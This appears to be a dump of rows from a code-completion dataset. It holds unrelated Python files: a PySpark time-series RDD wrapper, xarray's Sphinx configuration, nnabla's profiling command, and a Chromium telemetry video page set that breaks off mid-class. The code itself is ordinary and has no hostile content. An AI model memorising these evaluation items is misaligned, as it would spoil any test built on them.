gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
---|---|
from py4j.java_gateway import java_import
from pyspark import RDD
from pyspark.serializers import FramedSerializer, SpecialLengths, write_int, read_int
from pyspark.sql import DataFrame
from utils import datetime_to_millis
from datetimeindex import DateTimeIndex
import struct
import numpy as np
import pandas as pd
from io import BytesIO
class TimeSeriesRDD(RDD):
"""
A lazy distributed collection of univariate series with a conformed time dimension. Lazy in the
sense that it is an RDD: it encapsulates all the information needed to generate its elements,
but doesn't materialize them upon instantiation. Distributed in the sense that different
univariate series within the collection can be stored and processed on different nodes. Within
each univariate series, observations are not distributed. The time dimension is conformed in the
sense that a single DateTimeIndex applies to all the univariate series. Each univariate series
within the RDD has a String key to identify it.
"""
def __init__(self, dt_index, rdd, jtsrdd = None, sc = None):
if jtsrdd == None:
# Construct from a Python RDD object and a Python DateTimeIndex
jvm = rdd.ctx._jvm
jrdd = rdd._reserialize(_TimeSeriesSerializer())._jrdd.map( \
jvm.com.cloudera.sparkts.BytesToKeyAndSeries())
self._jtsrdd = jvm.com.cloudera.sparkts.TimeSeriesRDD( \
dt_index._jdt_index, jrdd.rdd())
RDD.__init__(self, rdd._jrdd, rdd.ctx)
else:
# Construct from a py4j.JavaObject pointing to a TimeSeriesRDD and a Python SparkContext
jvm = sc._jvm
jrdd = jvm.org.apache.spark.api.java.JavaRDD(jtsrdd, None).map( \
jvm.com.cloudera.sparkts.KeyAndSeriesToBytes())
RDD.__init__(self, jrdd, sc, _TimeSeriesSerializer())
self._jtsrdd = jtsrdd
def __getitem__(self, val):
"""Returns a TimeSeriesRDD representing a subslice of this TimeSeriesRDD, containing only
values for a sub-range of the time it covers.
"""
start = datetime_to_millis(val.start)
stop = datetime_to_millis(val.stop)
return TimeSeriesRDD(None, None, self._jtsrdd.slice(start, stop), self.ctx)
def differences(self, n):
"""Returns a TimeSeriesRDD where each time series is differenced with the given order.
The new RDD will be missing the first n date-times.
Parameters:
n : int
The order of differencing to perform.
"""
return TimeSeriesRDD(None, None, self._jtsrdd.differences(n), self.ctx)
def fill(self, method):
"""Returns a TimeSeriesRDD with missing values imputed using the given method.
Parameters:
method : string
"nearest" fills in NaNs with the closest non-NaN value, using the closest previous value
in the case of a tie. "linear" does a linear interpolation from the closest filled-in
values. "next" uses the closest value that is in the future of the missing value.
"previous" uses the closest value from the past of the missing value. "spline"
interpolates using a cubic spline.
"""
return TimeSeriesRDD(None, None, self._jtsrdd.fill(method), self.ctx)
def map_series(self, fn, dt_index = None):
"""Returns a TimeSeriesRDD, with a transformation applied to all the series in this RDD.
Either the series produced by the given function should conform to this TimeSeriesRDD's
index, or a new DateTimeIndex should be given that they conform to.
Parameters:
fn : function
A function that maps arrays of floats to arrays of floats.
dt_index : DateTimeIndex
A DateTimeIndex for the produced TimeseriesRDD.
"""
if dt_index == None:
dt_index = self.index()
return TimeSeriesRDD(dt_index, self.map(fn))
def to_instants(self):
"""Returns an RDD of instants, each a horizontal slice of this TimeSeriesRDD at a time.
This essentially transposes the TimeSeriesRDD, producing an RDD of tuples of datetime and
a numpy array containing all the observations that occurred at that time.
"""
jrdd = self._jtsrdd.toInstants(-1).toJavaRDD().map( \
self.ctx._jvm.com.cloudera.sparkts.InstantToBytes())
return RDD(jrdd, self.ctx, _InstantDeserializer())
def index(self):
"""Returns the index describing the times referred to by the elements of this TimeSeriesRDD
"""
jindex = self._jtsrdd.index()
return DateTimeIndex(jindex)
def to_observations_dataframe(self, sql_ctx, ts_col='timestamp', key_col='key', val_col='value'):
"""Returns a DataFrame of observations, each containing a timestamp, a key, and a value.
Parameters:
sql_ctx : SQLContext
ts_col : string
The name for the timestamp column.
key_col : string
The name for the key column.
val_col : string
The name for the value column.
"""
ssql_ctx = sql_ctx._ssql_ctx
jdf = self._jtsrdd.toObservationsDataFrame(ssql_ctx, ts_col, key_col, val_col)
return DataFrame(jdf, sql_ctx)
def remove_instants_with_nans(self):
"""Returns a TimeSeriesRDD with instants containing NaNs cut out.
The resulting TimeSeriesRDD has a slimmed down DateTimeIndex, missing all the instants
for which any series in the RDD contained a NaN.
"""
return TimeSeriesRDD(None, None, self._jtsrdd.removeInstantsWithNaNs(), self.ctx)
def filter(self, predicate):
return TimeSeriesRDD(self.index(), super(TimeSeriesRDD, self).filter(predicate))
def find_series(self, key):
"""Finds a series in the TimeSeriesRDD by its key.
Parameters:
key : string
The key of the series to find.
"""
# TODO: this could be more efficient if we pushed it down into Java
return filter(lambda x: x[0] == key).first()[1]
def time_series_rdd_from_observations(dt_index, df, ts_col, key_col, val_col):
"""Instantiates a TimeSeriesRDD from a DataFrame of observations.
An observation is a row containing a timestamp, a string key, and float value.
Parameters:
dt_index : DateTimeIndex
The index of the RDD to create. Observations not contained in this index will be ignored.
df : DataFrame
ts_col : string
The name of the column in the DataFrame containing the timestamps.
key_col : string
The name of the column in the DataFrame containing the keys.
val_col : string
The name of the column in the DataFrame containing the values.
"""
jvm = df._sc._jvm
jtsrdd = jvm.com.cloudera.sparkts.TimeSeriesRDD.timeSeriesRDDFromObservations( \
dt_index._jdt_index, df._jdf, ts_col, key_col, val_col)
return TimeSeriesRDD(None, None, jtsrdd, df._sc)
class _TimeSeriesSerializer(FramedSerializer):
"""Serializes (key, vector) pairs to and from bytes. Must be compatible with the Scala
implementation in com.cloudera.sparkts.{BytesToKeyAndSeries, KeyAndSeriesToBytes}
"""
def dumps(self, obj):
stream = BytesIO()
(key, vector) = obj
key_bytes = key.encode('utf-8')
write_int(len(key_bytes), stream)
stream.write(key_bytes)
write_int(len(vector), stream)
# TODO: maybe some optimized way to write this all at once?
for value in vector:
stream.write(struct.pack('!d', value))
stream.seek(0)
return stream.read()
def loads(self, obj):
stream = BytesIO(obj)
key_length = read_int(stream)
key = stream.read(key_length).decode('utf-8')
return (key, _read_vec(stream))
def __repr__(self):
return '_TimeSeriesSerializer'
class _InstantDeserializer(FramedSerializer):
"""Serializes (timestamp, vector) pairs to an from bytes. Must be compatible with the Scala
implementation in com.cloudera.sparkts.InstantToBytes
"""
def loads(self, obj):
stream = BytesIO(obj)
timestamp_ms = struct.unpack('!q', stream.read(8))[0]
return (pd.Timestamp(timestamp_ms * 1000000), _read_vec(stream))
def __repr__(self):
return "_InstantDeserializer"
def _read_vec(stream):
vector_length = read_int(stream)
vector = np.empty(vector_length)
# TODO: maybe some optimized way to read this all at once?
for i in xrange(vector_length):
vector[i] = struct.unpack('!d', stream.read(8))[0]
return vector
|
|
# -*- coding: utf-8 -*-
#
# xarray documentation build configuration file, created by
# sphinx-quickstart on Thu Feb 6 18:57:54 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import sys
import os
import datetime
import importlib
print("python exec:", sys.executable)
print("sys.path:", sys.path)
for name in ('numpy scipy pandas matplotlib dask IPython seaborn '
'cartopy netCDF4 rasterio').split():
try:
module = importlib.import_module(name)
if name == 'matplotlib':
module.use('Agg')
fname = module.__file__.rstrip('__init__.py')
print("%s: %s, %s" % (name, module.__version__, fname))
except ImportError:
print("no %s" % name)
import xarray
print("xarray: %s, %s" % (xarray.__version__, xarray.__file__))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.intersphinx',
'sphinx.ext.extlinks',
'sphinx.ext.mathjax',
'numpydoc',
'IPython.sphinxext.ipython_directive',
'IPython.sphinxext.ipython_console_highlighting',
'sphinx_gallery.gen_gallery',
]
extlinks = {'issue': ('https://github.com/pydata/xarray/issues/%s', 'GH'),
'pull': ('https://github.com/pydata/xarray/pull/%s', 'PR'),
}
sphinx_gallery_conf = {'examples_dirs': 'gallery',
'gallery_dirs': 'auto_gallery',
'backreferences_dir': False
}
autosummary_generate = True
numpydoc_class_members_toctree = True
numpydoc_show_class_members = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'xarray'
copyright = '2014-%s, xarray Developers' % datetime.datetime.now().year
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = xarray.version.short_version
# The full version, including alpha/beta/rc tags.
release = xarray.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%Y-%m-%d'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# on_rtd is whether we are on readthedocs.org, this line of code grabbed from
# docs.readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# otherwise, readthedocs.org uses their theme by default, so no need to specify it
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Sometimes the savefig directory doesn't exist and needs to be created
# https://github.com/ipython/ipython/issues/8733
# becomes obsolete when we can pin ipython>=5.2; see doc/environment.yml
ipython_savefig_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'_build','html','_static')
if not os.path.exists(ipython_savefig_dir):
os.makedirs(ipython_savefig_dir)
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = today_fmt
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'xarraydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'xarray.tex', 'xarray Documentation',
'xarray Developers', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'xarray', 'xarray Documentation',
['xarray Developers'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'xarray', 'xarray Documentation',
'xarray Developers', 'xarray', 'N-D labeled arrays and datasets in Python.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'python': ('https://docs.python.org/3/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'iris': ('http://scitools.org.uk/iris/docs/latest/', None),
'numpy': ('https://docs.scipy.org/doc/numpy/', None),
'numba': ('https://numba.pydata.org/numba-doc/latest/', None),
}
|
|
# Copyright 2017,2018,2019,2020,2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import time
from collections import OrderedDict
from functools import partial
import nnabla.utils.callback as callback
import nnabla.utils.load as load
import numpy as np
from contextlib2 import ExitStack # Backport from python3
from nnabla.ext_utils import import_extension_module
from nnabla.logger import logger
from nnabla.utils.cli.utility import let_data_to_variable
from nnabla.utils.progress import configure_progress, progress
def profile(config, name, func, result_dict, synchromize):
# Warm-up
func()
synchromize()
# Profile
start_0 = time.time()
result = 0
count = 0
while time.time() < start_0 + 1.0 or count < 100:
start = time.time()
func()
synchromize()
stop = time.time()
result += stop - start
count += 1
t = result * 1000 / count
logger.log(99, '%s %f(ms)' % (name, t))
result_dict[name] = t
return result_dict
def add_result(title, result_dict, result_array):
result_row = [line[0] for line in result_array]
col_index = len(result_array[0])
for k in result_dict.keys():
if k not in result_row:
result_row.append(k)
row = ['' for _ in range(len(result_array[0]))]
row[0] = k
result_array.append(row)
result_array[0].append(title)
for k, v in result_dict.items():
row_index = result_row.index(k)
result_array[row_index].append('%f' % v)
return result_array
def profile_optimizer(config, result_array, synchronize):
# Profile Training
for opt in config.optimizers.values():
o = opt.optimizer
result_name = "optimizer '%s' with network '%s'" % (
o.name, o.network.name)
result_dict = OrderedDict()
logger.log(99, 'Profiling ' + result_name + ' ...')
# Clear weight
for name, p in o.parameters.items():
if name[-2:] in ('/W', '/b'):
p.data.zero()
# Load dataset
def load_dataset():
loaded_data = {}
data = OrderedDict()
for di in opt.data_iterators:
if di not in loaded_data:
loaded_data[di] = di.next()
data.update(zip(di.variables, loaded_data[di]))
return data
profile(config, 'load_dataset', load_dataset, result_dict, synchronize)
# Let data
data = load_dataset()
for v, d in o.dataset_assign.items():
def let_data():
if d not in data:
raise ValueError(
'Data "' + d + '" is not found in dataset.')
let_data_to_variable(v.variable_instance, data=data[d],
data_name=d, variable_name=v.name)
profile(config, 'let_data (%s to %s)' %
(d, v.name), let_data, result_dict, synchronize)
# Generate data
for v, generator in o.generator_assign.items():
def generate_data():
let_data_to_variable(v.variable_instance,
data=generator(
v.variable_instance.d.shape),
variable_name=v.name)
profile(config, 'generate_data (%s)' %
v.name, generate_data, result_dict, synchronize)
'''
# Setup (detail)
for func in o.forward_sequence:
def setup():
o.network.setup_function(func)
profile(config, 'setup_function (%s : %s)' % (
func.name, func.function_instance.name), setup, result_dict, synchronize)
'''
# Warm-up
# o.network.forward(o.forward_sequence)
# o.network.prepare_backward(o.backward_sequence)
# o.network.backward(o.backward_sequence)
o.forward_sequence = []
o.backward_sequence = []
o.target.forward(clear_no_need_grad=True,
function_pre_hook=lambda f: o.forward_sequence.append(f))
o.target.backward(
clear_buffer=True, function_pre_hook=lambda f: o.backward_sequence.append(f))
# Forward (detail)
for func in o.forward_sequence:
if func.name == 'Sink':
continue
profile(config, 'forward_function (%s : %s)' % (func.name, func.name),
partial(func.forward, inputs=func.inputs,
outputs=func.outputs),
result_dict, synchronize)
# Backward (detail)
def empty_func():
pass # keep this for backward compatible
profile(config, 'prepare_backward',
empty_func, result_dict, synchronize)
for func in o.backward_sequence:
if func.name == 'Sink':
continue
profile(config, 'backward_function (%s : %s)' % (func.name, func.name),
partial(func.backward, inputs=func.inputs,
outputs=func.outputs),
result_dict, synchronize)
# Forward (all)
def forward_all():
o.target.forward(clear_no_need_grad=True)
profile(config, 'forward_all', forward_all, result_dict, synchronize)
# Backward (all)
def backward_all():
o.target.backward(clear_buffer=True)
profile(config, 'backward_all', backward_all, result_dict, synchronize)
# Backward (wo param zero_grad)
# Backward (all)
def backward_all_wo_zero_grad():
for name, p in o.parameters.items():
if name[-2:] in ('/W', '/b'):
p.grad.zero()
o.target.backward(clear_buffer=True)
profile(config, 'backward_all(wo param zero_grad)',
backward_all_wo_zero_grad, result_dict, synchronize)
# Update (weight decay)
if o.weight_decay > 0:
def weight_decay():
o.solver.weight_decay(o.weight_decay)
profile(config, 'weight_decay (%s)' %
o.solver.name, weight_decay, result_dict, synchronize)
# Update
def update():
o.solver.update()
profile(config, 'update (%s)' %
o.solver.name, update, result_dict, synchronize)
# Monitor loss
def monitor_loss():
for l in o.loss_variables:
np.mean(l.variable_instance.d)
profile(config, 'monitor_loss', monitor_loss, result_dict, synchronize)
result_array = add_result(result_name, result_dict, result_array)
return result_array
def profile_command(args):
callback.update_status(args)
configure_progress(os.path.join(args.outdir, 'progress.txt'))
class TrainConfig:
pass
config = TrainConfig()
info = load.load(args.config)
config.global_config = info.global_config
config.training_config = info.training_config
class OptConfig:
pass
config.optimizers = OrderedDict()
for name, opt in info.optimizers.items():
o = OptConfig()
o.optimizer = opt
o.data_iterators = []
config.optimizers[name] = o
class MonConfig:
pass
config.monitors = OrderedDict()
for name, mon in info.monitors.items():
m = MonConfig()
m.monitor = mon
m.data_iterators = []
config.monitors[name] = m
ext_module = import_extension_module(
config.global_config.default_context.backend[0].split(':')[0])
def synchronize(): return ext_module.synchronize(
device_id=config.global_config.default_context.device_id)
result_array = [['time in ms']]
callback.update_status('processing', True)
# Profile Optimizer
with ExitStack() as stack:
# Create data_iterator instance only once for each dataset in optimizers
optimizer_data_iterators = {}
for name, o in config.optimizers.items():
for di in o.optimizer.data_iterators.values():
if di not in optimizer_data_iterators:
di_instance = stack.enter_context(di())
optimizer_data_iterators[di] = di_instance
else:
di_instance = optimizer_data_iterators[di]
o.data_iterators.append(di_instance)
result_array = profile_optimizer(config, result_array, synchronize)
# Write profiling result
import csv
with open(args.outdir + os.sep + 'profile.csv', 'w') as f:
writer = csv.writer(f, lineterminator='\n')
writer.writerows(result_array)
logger.log(99, 'Profile Completed.')
progress(None)
callback.update_status('finished')
return True
def add_profile_command(subparsers):
# Profile
subparser = subparsers.add_parser(
'profile', help='Profiling performance with NNP.')
subparser.add_argument(
'-c', '--config', help='path to nntxt', required=True)
subparser.add_argument(
'-o', '--outdir', help='output directory', required=True)
subparser.set_defaults(func=profile_command)
|
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.page import page as page_module
from telemetry import story
class ToughVideoCasesPage(page_module.Page):
def __init__(self, url, page_set, labels=None):
super(ToughVideoCasesPage, self).__init__(
url=url, page_set=page_set, labels=labels)
def LoopMixedAudio(self, action_runner):
action_runner.PlayMedia(selector='#background_audio',
playing_event_timeout_in_seconds=60)
action_runner.LoopMedia(loop_count=50, selector='#mixed_audio')
def LoopSingleAudio(self, action_runner):
action_runner.LoopMedia(loop_count=50, selector='#single_audio')
def PlayAction(self, action_runner):
action_runner.PlayMedia(playing_event_timeout_in_seconds=60,
ended_event_timeout_in_seconds=60)
def SeekBeforeAndAfterPlayhead(self, action_runner,
action_timeout_in_seconds=60):
timeout = action_timeout_in_seconds
# Because an ended timeout is passed, this won't return until the media has
# played through.
action_runner.PlayMedia(playing_event_timeout_in_seconds=timeout,
ended_event_timeout_in_seconds=timeout)
# Wait 1 second for no reason in particular.
action_runner.Wait(1)
# Seek to before the play-head location.
action_runner.SeekMedia(seconds=0.5, timeout_in_seconds=timeout,
label='seek_warm')
# Seek to after the play-head location.
action_runner.SeekMedia(seconds=9, timeout_in_seconds=timeout,
label='seek_cold')
class Page1(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page1, self).__init__(
url='file://tough_video_cases/video.html?src=crowd.wav&type=audio',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page2(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page2, self).__init__(
url='file://tough_video_cases/video.html?src=crowd.ogg&type=audio',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page3(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page3, self).__init__(
url='file://tough_video_cases/video.html?src=crowd1080.ogv',
page_set=page_set)
self.add_browser_metrics = True
self.is_50fps = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page4(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page4, self).__init__(
url='file://tough_video_cases/video.html?src=crowd1080.webm',
page_set=page_set, labels=['is_50fps'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page5(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page5, self).__init__(
url='file://tough_video_cases/video.html?src=crowd2160.ogv',
page_set=page_set, labels=['is_4k', 'is_50fps'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page6(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page6, self).__init__(
url='file://tough_video_cases/video.html?src=crowd2160.webm',
page_set=page_set, labels=['is_4k', 'is_50fps'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page7(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page7, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.ogg&type=audio',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page8(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page8, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.wav&type=audio',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page9(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page9, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.ogv',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page10(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page10, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.webm',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page11(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page11, self).__init__(
url='file://tough_video_cases/video.html?src=crowd1080.mp4',
page_set=page_set, labels=['is_50fps'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page12(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page12, self).__init__(
url='file://tough_video_cases/video.html?src=crowd2160.mp4',
page_set=page_set, labels=['is_4k', 'is_50fps'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page13(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page13, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.mp3&type=audio',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page14(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page14, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.mp4',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page15(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page15, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.m4a&type=audio',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page16(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page16, self).__init__(
url='file://tough_video_cases/video.html?src=garden2_10s.webm',
page_set=page_set, labels=['is_4k'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page17(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page17, self).__init__(
url='file://tough_video_cases/video.html?src=garden2_10s.mp4',
page_set=page_set, labels=['is_4k'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page18(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page18, self).__init__(
url='file://tough_video_cases/video.html?src=garden2_10s.ogv',
page_set=page_set, labels=['is_4k'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page19(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page19, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.ogg&type=audio',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page20(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page20, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.wav&type=audio',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page21(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page21, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.ogv',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page22(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page22, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.webm',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page23(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page23, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.mp3&type=audio',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page24(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page24, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.mp4',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page25(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page25, self).__init__(
url='file://tough_video_cases/video.html?src=garden2_10s.webm',
page_set=page_set, labels=['is_4k'])
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page26(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page26, self).__init__(
url='file://tough_video_cases/video.html?src=garden2_10s.mp4',
page_set=page_set, labels=['is_4k'])
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page27(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page27, self).__init__(
url='file://tough_video_cases/video.html?src=garden2_10s.ogv',
page_set=page_set, labels=['is_4k'])
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page28(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page28, self).__init__(
url='file://tough_video_cases/audio_playback.html?id=single_audio',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.LoopSingleAudio(action_runner)
class Page29(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page29, self).__init__(
url='file://tough_video_cases/audio_playback.html?id=mixed_audio',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.LoopMixedAudio(action_runner)
class Page30(ToughVideoCasesPage):
def __init__(self, page_set):
